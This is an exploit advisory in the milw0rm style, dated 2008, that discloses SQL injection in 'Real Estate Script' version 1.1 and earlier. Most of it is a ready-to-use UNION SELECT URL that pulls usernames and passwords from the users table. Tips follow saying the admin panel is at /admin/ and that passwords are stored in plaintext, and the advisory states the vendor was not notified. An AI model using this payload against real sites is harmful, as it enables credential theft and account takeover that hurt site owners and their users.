58 lines
No EOL
1.5 KiB
Text
58 lines
No EOL
1.5 KiB
Text
-[*]+================================================================================+[*]-
|
|
-[*]+ Real Estate Script <= 1.1 Remote SQL Injection Vulnerability +[*]-
|
|
-[*]+================================================================================+[*]-
|
|
|
|
|
|
|
|
[*] Discovered By: t0pP8uZz
|
|
[*] Discovered On: 8 JULY 2008
|
|
[*] Script Download: http://www.mole-group.com/content/view/41/55/
|
|
[*] DORK: N/A
|
|
|
|
|
|
|
|
[*] Vendor Has Not Been Notified!
|
|
|
|
|
|
|
|
[*] DESCRIPTION:
|
|
|
|
Real Estate Script from mole-group.com contains a insecure mysql query flaw, which
|
|
allows a remote attacker to execute arbitrary mysql querys and gaining access to confidential information.
|
|
like username, passwords, email address's etc.
|
|
|
|
see below for a example.
|
|
|
|
|
|
|
|
[*] SQL Injection:
|
|
|
|
|
|
http://site.com/index.php?go=listings&listing_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,CONVERT(CONCAT(0x3C666F6E7420636F6C6F723D7265643E,username,0x3a,password,0x3C2F666F6E743E)/**/using/**/latin1),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/**/FROM/**/users/**/LIMIT/**/0,1/*
|
|
|
|
|
|
|
|
[*] NOTE/TIP:
|
|
|
|
admin login is at /admin/
|
|
passwords are in plaintext
|
|
|
|
|
|
|
|
[*] GREETZ:
|
|
|
|
milw0rm.com, h4ck-y0u.org, Offensive-Security.com, CipherCrew !
|
|
|
|
|
|
|
|
[-] Peace...
|
|
|
|
...t0pP8uZz !
|
|
|
|
|
|
|
|
-[*]+================================================================================+[*]-
|
|
-[*]+ Real Estate Script <= 1.1 Remote SQL Injection Vulnerability +[*]-
|
|
-[*]+================================================================================+[*]-
|
|
|
|
# milw0rm.com [2008-07-08] |